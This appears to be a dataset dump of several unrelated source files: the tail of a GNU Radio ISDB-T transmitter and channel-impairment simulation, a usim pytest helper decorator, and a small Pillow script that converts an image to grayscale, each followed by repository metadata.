.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,-27.0,-27.0,-27.1,-27.1,-27.1,-27.2,-27.2,-27.2,-27.3,-27.3,-27.3,-27.4,-27.4,-27.4,-27.5,-27.5,-27.5,-27.6,-27.6,-27.6,-27.7,-27.7,-27.7,-27.8,-27.8,-27.8,-27.9,-27.9,-27.9,-28.0,-28.0,-28.0,-28.0,-28.1,-28.1,-28.1,-28.2,-28.2,-28.2,-28.3,-28.3,-28.3,-28.4,-28.4,-28.4,-28.5,-28.5,-28.5,-28.6,-28.6,-28.6,-28.7,-28.7,-28.7,-28.8,-28.8,-28.8,-28.9,-28.9,-28.9,-29.0,-29.0,-29.0,-29.1,-29.1,-29.1,-29.2,-29.2,-29.2,-29.3,-29.3,-29.3,-29.4,-29.4,-29.4,-29.5,-29.5,-29.5,-29.6,-29.6,-29.6,-29.7,-29.7,-29.7,-29.8,-29.8,-29.8,-29.9,-29.9,-29.9,-30.0,-30.0,-30.0,-30.0,-30.1,-30.1,-30.1,-30.2,-30.2,-30.2,-30.3,-30.3,-30.3,-30.4,-30.4,-30.4,-30.5,-30.5,-30.5,-30.6,-30.6,-30.6,-30.7,-30.7,-30.7,-30.8,-30.8,-30.8,-30.9,-30.9,-30.9,-31.0,-31.0,-31.0,-31.1,-31.1,-31.1,-31.2,-31.2,-31.2,-31.3,-31.3,-31.3,-31.4,-31.4,-31.4,-31.5,-31.5,-31.5,-31.6,-31.6,-31.6,-31.7,-31.7,-31.7,-31.8,-31.8,-31.8,-31.9,-31.9,-31.9,-32.0,-32.0,-32.0,-32.0,-32.1,-32.1,-32.1,-32.2,-32.2,-32.2,-32.3,-32.3,-32.3,-32.4,-32.4,-32.4,-32.5,-32.5,-32.5,-32.6,-32.6,-32.6,-32.7,-32.7,-32.7,-32.8,-32.8,-32.8,-32.9,-32.9,-32.9,-33.0,-33.0,-33.0,-33.1,-33.1,-33.1,-33.2,-33.2,-33.2,-33.3,-33.3,-33.3,-33.4,-33.4,-33.4,-33.5,-33.5,-33.5,-33.6,-33.6,-33.6,-33.7,-33.7,-33.7,-33.8,-33.8,-33.8,-33.9,-33.9,-33.9,-34.0,-34.0,-34.0,-34.0,-34.1,-34.1,-34.1,-34.2,-34.2,-34.2,-34.3,-34.3,-34.3,-34.4,-34.4,-34.4,-34.5,-34.5,-34.5,-34.6,-34.6,-34.6,-34.7,-34.7,-34.7,-34.8,-34.8,-34.8,-34.9,-34.9,-34.9,-35.0,-35.0,-35.0,-35.1,-35.1,-35.1,-35.2,-35.2,-35.2,-35.3,-35.3,-35.3,-35.4,-35.4,-35.4,-35.5,-35.5,-35.5,-35.6,-35.6,-35.6,-35.7,-35.7,-35.7,-35.8,-35.8,-35.8,-35.9,-35.9,-35.9,-36.0,-36.0,-36.0,-36.0,-36.1,-36.1,-36.1,-36.2,-36.2,-36.2,-36.3,-36.3,-36.3,-36.4,-36.4,-36.4,-36.5,-36.5,-36.5,-36.6,-36.6,-36.6,-36.7,-36.7,-36.7,-36.8,-36.8,-36.8,-36.9,-36.9,-36.9,-37.0,-37.0,-37.0,-37.1,-37.1,-37.1,-37.2,-37.2,-37.2,-37.3,-37.3,-37.3,-37.4,-37.4,-37.4,-37.5,-37.5,-37.5,-37.6,-37.6,-37.6,-37.7,-37.7,-37.7,-37.8,-37.8,-37.8,-37.9,-37.9,-37.9,-38.0,-38.0,-38.0,-38.0,-38.1,-38.1,-38.1,-38.2,-38.2,-38.2,-38.3,-38.3,-38.3,-38.4,-38.4,-38.4,-38.5,-38.5,-38.5,-38.6,-38.6,-38.6,-38.7,-38.7,-38.7,-38.8,-38.8,-38.8,-38.9,-38.9,-38.9,-39.0,-39.0,-39.0,-39.1,-39.1,-39.1,-39.2,-39.2,-39.2,-39.3,-39.3,-39.3,-39.4,-39.4,-39.4,-39.5,-39.5,-39.5,-39.6,-39.6,-39.6,-39.7,-39.7,-39.7,-39.8,-39.8,-39.8,-39.9,-39.9,-39.9,-40.0,-40.0,-40.0,-40.0,-40.1,-40.1,-40.1,-40.2,-40.2,-40.2,-40.3,-40.3,-40.3,-40.4,-40.4,-40.4,-40.5,-40.5,-40.5,-40.6,-40.6,-40.6,-40.7,-40.7,-40.7,-40.8,-40.8,-40.8,-40.9,-40.9,-40.9,-41.0,-41.0,-41.0,-41.1,-41.1,-41.1,-41.2,-41.2,-41.2,-41.3,-41.3,-41.3,-41.4,-41.4,-41.4,-41.5,-41.5,-41.5,-41.6,-41.6,-41.6,-41.7,-41.7,-41.7,-41.8,-41.8,-41.8,-41.9,-41.9,-41.9,-42.0,-42.0,-42.0,-42.0,-42.1,-42.1,-42.1,-42.2,-42.2,-42.2,-42.3,-42.3,-42.3,-42.4,-42.4,-42.4,-42.5,-42.5,-42.5,-42.6,-42.6,-42.6,-42.7,-42.7,-42.7,-42.8,-42.8,-42.8,-42.9,-42.9,-42.9,-43.0,-43.0,-43.0,-43.1,-43.1,-43.1,-43.2,-43.2,-43.2,-43.3,-43.3,-43.3,-43.4,-43.4,-43.4,-43.5,-43.5,-43.5,-43.6,-43.6,-43.6,-43.7,-43.7,-43.7,-43.8,-43.8,-43.8,-43.9,-43.9,-43.9,-44.0,-44.0,-44.0,-44.0,-44.1,-44.1,-44.1,-44.2,-44.2,-44.2,-44.3,-44.3,-44.3,-44.4,-44.4,-44.4,-44.5,-44.5,-44.5,-44.6,-44.6,-44.6,-44.7,-44.7,-44.7,-44.8,-44.8,-44.8,-44.9,-44.9,-44.9,-45.0,-45.0), True, 1, [])
self.blocks_sub_xx_0_0_0 = blocks.sub_ff(1)
self.blocks_sub_xx_0_0 = blocks.sub_ff(1)
self.blocks_sub_xx_0 = blocks.sub_ff(1)
self.blocks_stream_to_vector_1_0_0 = blocks.stream_to_vector(gr.sizeof_float*1, 4096)
self.blocks_stream_to_vector_1_0 = blocks.stream_to_vector(gr.sizeof_float*1, 4096)
self.blocks_stream_to_vector_1 = blocks.stream_to_vector(gr.sizeof_float*1, 4096)
self.blocks_stream_to_vector_0_1 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, 4096)
self.blocks_stream_to_vector_0_0 = blocks.stream_to_vector(gr.sizeof_char*1, 188)
self.blocks_stream_to_vector_0 = blocks.stream_to_vector(gr.sizeof_char*1, 188)
self.blocks_skiphead_0 = blocks.skiphead(gr.sizeof_gr_complex*data_carriers, 2)
self.blocks_rms_xx_0_0 = blocks.rms_ff(0.0001)
self.blocks_nlog10_ff_0 = blocks.nlog10_ff(10, 4096, -20*np.log10(4096))
self.blocks_multiply_const_xx_0 = blocks.multiply_const_cc(bb_gain)
self.blocks_keep_one_in_n_0_0 = blocks.keep_one_in_n(gr.sizeof_gr_complex*1, 14)
self.blocks_file_source_0_0 = blocks.file_source(gr.sizeof_char*1, '/home/mili/Documents/FACULTAD/2020/1er_Cuatrimestre/Radiodifusion/FINAL/layer_b.ts', True)
self.blocks_file_source_0_0.set_begin_tag(pmt.PMT_NIL)
self.blocks_file_source_0 = blocks.file_source(gr.sizeof_char*1, '/home/mili/Documents/FACULTAD/2020/1er_Cuatrimestre/Radiodifusion/FINAL/layer_a.ts', True)
self.blocks_file_source_0.set_begin_tag(pmt.PMT_NIL)
self.blocks_complex_to_mag_squared_0 = blocks.complex_to_mag_squared(4096)
self.analog_const_source_x_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, AjusteMascara)
self.analog_const_source_x_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, AjusteMascara)
self.analog_const_source_x_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, AjusteMascara)
##################################################
# Connections
##################################################
self.connect((self.analog_const_source_x_0, 0), (self.blocks_sub_xx_0, 1))
self.connect((self.analog_const_source_x_0_0, 0), (self.blocks_sub_xx_0_0, 1))
self.connect((self.analog_const_source_x_0_0_0, 0), (self.blocks_sub_xx_0_0_0, 1))
self.connect((self.blocks_complex_to_mag_squared_0, 0), (self.blocks_nlog10_ff_0, 0))
self.connect((self.blocks_file_source_0, 0), (self.blocks_stream_to_vector_0, 0))
self.connect((self.blocks_file_source_0_0, 0), (self.blocks_stream_to_vector_0_0, 0))
self.connect((self.blocks_keep_one_in_n_0_0, 0), (self.mer_probe_mer_c_0_0_0, 0))
self.connect((self.blocks_keep_one_in_n_0_0, 0), (self.qtgui_const_sink_x_0_0, 0))
self.connect((self.blocks_multiply_const_xx_0, 0), (self.channels_channel_model_0, 0))
self.connect((self.blocks_nlog10_ff_0, 0), (self.qtgui_vector_sink_f_0, 0))
self.connect((self.blocks_rms_xx_0_0, 0), (self.qtgui_number_sink_0_0, 0))
self.connect((self.blocks_skiphead_0, 0), (self.isdbt_pilot_signals_0, 0))
self.connect((self.blocks_stream_to_vector_0, 0), (self.dtv_dvbt_reed_solomon_enc_0, 0))
self.connect((self.blocks_stream_to_vector_0_0, 0), (self.dtv_dvbt_reed_solomon_enc_0_0, 0))
self.connect((self.blocks_stream_to_vector_0_1, 0), (self.fft_vxx_0, 0))
self.connect((self.blocks_stream_to_vector_1, 0), (self.qtgui_vector_sink_f_0, 1))
self.connect((self.blocks_stream_to_vector_1_0, 0), (self.qtgui_vector_sink_f_0, 2))
self.connect((self.blocks_stream_to_vector_1_0_0, 0), (self.qtgui_vector_sink_f_0, 3))
self.connect((self.blocks_sub_xx_0, 0), (self.blocks_stream_to_vector_1, 0))
self.connect((self.blocks_sub_xx_0_0, 0), (self.blocks_stream_to_vector_1_0, 0))
self.connect((self.blocks_sub_xx_0_0_0, 0), (self.blocks_stream_to_vector_1_0_0, 0))
self.connect((self.blocks_vector_source_x_0, 0), (self.blocks_sub_xx_0, 0))
self.connect((self.blocks_vector_source_x_0_0, 0), (self.blocks_sub_xx_0_0, 0))
self.connect((self.blocks_vector_source_x_0_0_0, 0), (self.blocks_sub_xx_0_0_0, 0))
self.connect((self.blocks_vector_to_stream_0_1, 0), (self.isdbt_carrier_modulation_0, 0))
self.connect((self.blocks_vector_to_stream_0_1_0, 0), (self.isdbt_carrier_modulation_0_0, 0))
self.connect((self.blocks_vector_to_stream_0_2_0, 0), (self.blocks_keep_one_in_n_0_0, 0))
self.connect((self.channels_channel_model_0, 0), (self.channels_impairments_0, 0))
self.connect((self.channels_impairments_0, 0), (self.blocks_stream_to_vector_0_1, 0))
self.connect((self.channels_impairments_0, 0), (self.low_pass_filter_0_0, 0))
self.connect((self.digital_ofdm_cyclic_prefixer_0, 0), (self.blocks_multiply_const_xx_0, 0))
self.connect((self.dtv_dvbt_inner_coder_0_0, 0), (self.blocks_vector_to_stream_0_1, 0))
self.connect((self.dtv_dvbt_inner_coder_0_0_0, 0), (self.blocks_vector_to_stream_0_1_0, 0))
self.connect((self.dtv_dvbt_reed_solomon_enc_0, 0), (self.isdbt_energy_dispersal_0, 0))
self.connect((self.dtv_dvbt_reed_solomon_enc_0_0, 0), (self.isdbt_energy_dispersal_0_0, 0))
self.connect((self.fft_vxx_0, 0), (self.blocks_complex_to_mag_squared_0, 0))
self.connect((self.fft_vxx_1, 0), (self.digital_ofdm_cyclic_prefixer_0, 0))
self.connect((self.isdbt_byte_interleaver_0, 0), (self.dtv_dvbt_inner_coder_0_0, 0))
self.connect((self.isdbt_byte_interleaver_0_0, 0), (self.dtv_dvbt_inner_coder_0_0_0, 0))
self.connect((self.isdbt_carrier_modulation_0, 0), (self.isdbt_hierarchical_combinator_0, 0))
self.connect((self.isdbt_carrier_modulation_0_0, 0), (self.isdbt_hierarchical_combinator_0, 1))
self.connect((self.isdbt_energy_dispersal_0, 0), (self.isdbt_byte_interleaver_0, 0))
self.connect((self.isdbt_energy_dispersal_0_0, 0), (self.isdbt_byte_interleaver_0_0, 0))
self.connect((self.isdbt_frequency_interleaver_0, 0), (self.blocks_skiphead_0, 0))
self.connect((self.isdbt_hierarchical_combinator_0, 0), (self.isdbt_time_interleaver_0, 0))
self.connect((self.isdbt_isdbt_rf_channel_decoding_0_0, 0), (self.isdbt_subset_of_carriers_0_0, 0))
self.connect((self.isdbt_pilot_signals_0, 0), (self.isdbt_tmcc_encoder_0, 0))
self.connect((self.isdbt_subset_of_carriers_0_0, 0), (self.blocks_vector_to_stream_0_2_0, 0))
self.connect((self.isdbt_time_interleaver_0, 0), (self.isdbt_frequency_interleaver_0, 0))
self.connect((self.isdbt_tmcc_encoder_0, 0), (self.fft_vxx_1, 0))
self.connect((self.low_pass_filter_0_0, 0), (self.isdbt_isdbt_rf_channel_decoding_0_0, 0))
self.connect((self.mer_probe_mer_c_0_0_0, 0), (self.blocks_rms_xx_0_0, 0))
def closeEvent(self, event):
self.settings = Qt.QSettings("GNU Radio", "top_block")
self.settings.setValue("geometry", self.saveGeometry())
event.accept()
def get_samp_rate(self):
return self.samp_rate
def set_samp_rate(self, samp_rate):
self.samp_rate = samp_rate
self.qtgui_vector_sink_f_0.set_x_axis(-(self.samp_rate/2)/1e6, (self.samp_rate/4096)/1e6)
self.low_pass_filter_0_0.set_taps(firdes.low_pass(1, self.samp_rate, 5.8e6/2.0, 0.5e6, firdes.WIN_HAMMING, 6.76))
def get_taps(self):
return self.taps
def set_taps(self, taps):
self.taps = taps
self.set_delay((len(self.taps)/2)-1)
self.channels_channel_model_0.set_taps((self.taps))
def get_mode(self):
return self.mode
def set_mode(self, mode):
self.mode = mode
self.set_total_carriers(2**(10+self.mode))
self.set_data_carriers(13*96*2**(self.mode-1))
def get_total_carriers(self):
return self.total_carriers
def set_total_carriers(self, total_carriers):
self.total_carriers = total_carriers
def get_symbol_table_QPSK(self):
return self.symbol_table_QPSK
def set_symbol_table_QPSK(self, symbol_table_QPSK):
self.symbol_table_QPSK = symbol_table_QPSK
def get_symbol_table_64QAM(self):
return self.symbol_table_64QAM
def set_symbol_table_64QAM(self, symbol_table_64QAM):
self.symbol_table_64QAM = symbol_table_64QAM
def get_segments_c(self):
return self.segments_c
def set_segments_c(self, segments_c):
self.segments_c = segments_c
def get_segments_b(self):
return self.segments_b
def set_segments_b(self, segments_b):
self.segments_b = segments_b
def get_segments_a(self):
return self.segments_a
def set_segments_a(self, segments_a):
self.segments_a = segments_a
def get_phase_noise(self):
return self.phase_noise
def set_phase_noise(self, phase_noise):
self.phase_noise = phase_noise
self.channels_impairments_0.set_phase_noise_mag(self.phase_noise)
def get_noise_volt(self):
return self.noise_volt
def set_noise_volt(self, noise_volt):
self.noise_volt = noise_volt
self.channels_channel_model_0.set_noise_voltage(self.noise_volt)
def get_length_c(self):
return self.length_c
def set_length_c(self, length_c):
self.length_c = length_c
def get_length_b(self):
return self.length_b
def set_length_b(self, length_b):
self.length_b = length_b
def get_length_a(self):
return self.length_a
def set_length_a(self, length_a):
self.length_a = length_a
def get_guard(self):
return self.guard
def set_guard(self, guard):
self.guard = guard
def get_frec_offset(self):
return self.frec_offset
def set_frec_offset(self, frec_offset):
self.frec_offset = frec_offset
self.channels_impairments_0.set_freq_offset(self.frec_offset)
self.channels_channel_model_0.set_frequency_offset(self.frec_offset)
def get_delay(self):
return self.delay
def set_delay(self, delay):
self.delay = delay
def get_data_carriers(self):
return self.data_carriers
def set_data_carriers(self, data_carriers):
self.data_carriers = data_carriers
def get_bb_gain(self):
return self.bb_gain
def set_bb_gain(self, bb_gain):
self.bb_gain = bb_gain
self.blocks_multiply_const_xx_0.set_k(self.bb_gain)
def get_TOI(self):
return self.TOI
def set_TOI(self, TOI):
self.TOI = TOI
self.channels_impairments_0.set_beta(self.TOI)
def get_SOI(self):
return self.SOI
def set_SOI(self, SOI):
self.SOI = SOI
self.channels_impairments_0.set_gamma(self.SOI)
def get_Quad_Offset(self):
return self.Quad_Offset
def set_Quad_Offset(self, Quad_Offset):
self.Quad_Offset = Quad_Offset
self.channels_impairments_0.set_q_ofs(self.Quad_Offset)
def get_Infase_Offset(self):
return self.Infase_Offset
def set_Infase_Offset(self, Infase_Offset):
self.Infase_Offset = Infase_Offset
self.channels_impairments_0.set_i_ofs(self.Infase_Offset)
def get_IQ_Phase_Imbalance(self):
return self.IQ_Phase_Imbalance
def set_IQ_Phase_Imbalance(self, IQ_Phase_Imbalance):
self.IQ_Phase_Imbalance = IQ_Phase_Imbalance
self.channels_impairments_0.set_phasebal(self.IQ_Phase_Imbalance)
def get_IQ_Mag_Imbalance(self):
return self.IQ_Mag_Imbalance
def set_IQ_Mag_Imbalance(self, IQ_Mag_Imbalance):
self.IQ_Mag_Imbalance = IQ_Mag_Imbalance
self.channels_impairments_0.set_magbal(self.IQ_Mag_Imbalance)
def get_AjusteMascara(self):
return self.AjusteMascara
def set_AjusteMascara(self, AjusteMascara):
self.AjusteMascara = AjusteMascara
self.analog_const_source_x_0_0_0.set_offset(self.AjusteMascara)
self.analog_const_source_x_0_0.set_offset(self.AjusteMascara)
self.analog_const_source_x_0.set_offset(self.AjusteMascara)
def main(top_block_cls=top_block, options=None):
qapp = Qt.QApplication(sys.argv)
tb = top_block_cls()
tb.start()
tb.show()
def quitting():
tb.stop()
tb.wait()
qapp.aboutToQuit.connect(quitting)
qapp.exec_()
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | noreply@github.com |
c3130eff5ead53a74d10c68261d2e3559dfc4623 | 91ab6e48d02822bd957e210484fceff4ce0b7d61 | /usim_pytest/test_usimpy/utility.py | 07f6c368aa6577c5ef2802885d34f46f00ad824f | [
"MIT"
] | permissive | MaineKuehn/usim | d203c78f2f644f546b932d1da40b50f26403d053 | 28615825fbe23140bbf9efe63fb18410f9453441 | refs/heads/master | 2021-09-25T08:05:03.015523 | 2021-09-17T13:42:39 | 2021-09-17T13:42:39 | 177,617,781 | 18 | 3 | MIT | 2021-09-17T13:42:40 | 2019-03-25T15:50:34 | Python | UTF-8 | Python | false | false | 1,097 | py | from functools import wraps
from typing import Callable, Generator
from ..utility import UnfinishedTest
def via_usimpy(test_case: Callable[..., Generator]):
"""
Mark a generator function test case to be run via a ``usim.py.Environment``
.. code:: python3
@via_usimpy
def test_sleep(env):
before = env.now
yield env.timeout(20)
after = env.now
assert after - before == 20
Note that ``env`` is passed in as a keyword argument.
"""
@wraps(test_case)
def run_test(self=None, env=None, **kwargs):
test_completed = False
if self is not None:
kwargs['self'] = self
def complete_test_case():
__tracebackhide__ = True
nonlocal test_completed
yield from test_case(env=env, **kwargs)
test_completed = True
__tracebackhide__ = True
env.process(complete_test_case())
result = env.run()
if not test_completed:
raise UnfinishedTest(test_case)
return result
return run_test
| [
"maxfischer2781@gmail.com"
] | maxfischer2781@gmail.com |
381480860df458c87e5cf101bb9259c71ffeca3f | 8951d78a98ced3e61c465814bc19185c2fa983f9 | /23. pip(external_package)/03. pillow/imageProcessing3.py | beaa26c21358943f6bfed897bc89b0b9213b2cf2 | [] | no_license | yusuke-hi-rei/python | 0f14a70c5d701a691fa797275d5a8ee08ff51e0e | 41abaea22c5d17395a397cbd6d6d34dae62808e3 | refs/heads/master | 2022-04-15T12:12:06.165098 | 2020-04-11T16:35:26 | 2020-04-11T16:35:26 | 254,903,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py | ## Convert to monochrome.
from PIL import Image
#! Exception processing is performed assuming
#! that the image file cannot be opened.
try:
img1 = Image.open("image.jpg", "r")
#! L: grayscale.
img2 = img1.convert("L")
img2.save("image_saved3.jpg", "JPEG")
print("saved...")
except IOError as error:
print(error)
| [
"yultutin01@yahoo.co.jp"
] | yultutin01@yahoo.co.jp |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.